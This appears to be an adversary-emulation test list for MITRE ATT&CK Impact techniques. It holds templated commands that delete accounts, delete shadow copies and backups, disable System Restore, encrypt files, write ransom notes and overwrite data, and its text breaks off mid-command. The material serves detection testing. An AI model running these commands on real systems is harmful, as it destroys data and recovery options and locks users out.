Account Access Removal
System Shutdown/Reboot
Resource Hijacking
Defacement: Internal Defacement
Inhibit System Recovery
Service Stop
Data Encrypted for Impact
Data Destruction
T1531
Account Access Removal
Change User Password - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}

Delete User - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /delete

Remove Account From Domain Admin Group
$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
    Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
    write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}

Change User Password via passwd
passwd #{user_account} #enter admin password > enter new password > confirm new password

Delete User via dscl utility
dscl . -delete /Users/#{user_account} #enter admin password

Delete User via sysadminctl utility
sysadminctl -deleteUser #{user_account} #enter admin password

Azure AD - Delete user via Azure AD PowerShell
Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalname

Azure AD - Delete user via Azure CLI
az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalname
T1529
System Shutdown/Reboot
Shutdown System - Windows
shutdown /s /t #{timeout}

Restart System - Windows
shutdown /r /t #{timeout}

Restart System via shutdown - macOS/Linux
Shutdown System via shutdown - macOS/Linux
Restart System via reboot - macOS/Linux
Shutdown System via halt - Linux
Reboot System via halt - Linux
Shutdown System via poweroff - Linux
Reboot System via poweroff - Linux
Logoff System - Windows
T1496
Resource Hijacking
macOS/Linux - Simulate CPU Load with Yes
T1491.001
Defacement: Internal Defacement
Replace Desktop Wallpaper
$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{

    public class Wallpaper{
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
        static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;

        public static void SetWallpaper(string thePath){
            SystemParametersInfo(20,0,thePath,3);
        }
    }
}
'@
$wc = New-Object System.Net.WebClient
try{
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
    Write-Host("Cannot download $url")
    add-type $updateWallpapercode
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
    $wc.Dispose()
}

Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
T1490
Inhibit System Recovery
Windows - Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quiet

Windows - Delete Volume Shadow Copies via WMI
wmic.exe shadowcopy delete

Windows - wbadmin Delete Windows Backup Catalog
wbadmin delete catalog -quiet

Windows - Disable Windows Recovery Console Repair
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no

Windows - Delete Volume Shadow Copies via WMI with PowerShell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

Windows - Delete Backup Files
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk

Windows - wbadmin Delete systemstatebackup
wbadmin delete systemstatebackup -keepVersions:0

Windows - Disable the SR scheduled task
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

Disable System Restore Through Registry
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
T1489
Service Stop
Windows - Stop service using Service Controller
sc.exe stop #{service_name}

Windows - Stop service using net.exe
net.exe stop #{service_name}

Windows - Stop service by killing process
taskkill.exe /f /im #{process_name}
T1486
Data Encrypted for Impact
Encrypt files using gpg (Linux)
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}

Encrypt files using 7z (Linux)
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}

Encrypt files using ccrypt (Linux)
if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi

Encrypt files using openssl (Linux)
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}

PureLocker Ransom Note
echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt

Encrypt files using 7z utility - macOS
# the password must be attached directly to -p; a bare -p makes 7z prompt interactively and shifts the remaining arguments
7z a -p#{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}

Encrypt files using openssl utility - macOS
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}

Data Encrypted with GPG4Win
cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'
T1485
Data Destruction
Windows - Overwrite file with Sysinternals SDelete
if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"

macOS/Linux - Overwrite file with DD
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes

Overwrite deleted data on C drive

GCP - Delete Bucket
gcloud config set project #{project_id}
gcloud storage buckets delete gs: